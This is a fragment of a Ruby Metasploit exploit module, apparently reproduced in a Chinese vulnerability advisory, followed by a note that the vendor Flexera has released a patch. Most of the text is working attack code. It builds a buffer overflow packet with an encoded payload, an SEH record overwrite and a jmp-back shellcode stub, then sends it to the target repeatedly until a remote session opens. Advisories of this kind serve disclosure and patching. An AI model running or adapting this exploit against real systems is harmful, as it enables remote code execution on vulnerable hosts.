def exploit
i = 1
while i <= datastore['Attempts'] and not session_created?
print_status("Attempt #{i}/#{datastore['Attempts']} to exploit...")
do_exploit
sleep(datastore['Wait'])
i = i + 1
end
if not session_created?
print_error("Exploit didn't work after #{i} attempts")
end
end
def do_exploit
t = framework.threads.spawn("jam", false) { jam }
my_payload = payload.encoded
header_length = 20 # See create_packet() to understand this number
pkt_data = ""
if target.name =~ /Debug/
pkt_data << "a" * (65535 - header_length)
else
pkt_data << "a" * (target['ShellcodeOffset'])
pkt_data << my_payload
pkt_data << "b" * (target['Offset']-target['ShellcodeOffset']-my_payload.length)
pkt_data << generate_seh_record(target.ret)
pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string
pkt_data << "c" * (65535 - pkt_data.length - header_length)
end
pkt = create_packet(pkt_data)
connect
sock.put(pkt)
handler
disconnect
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Flexera
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: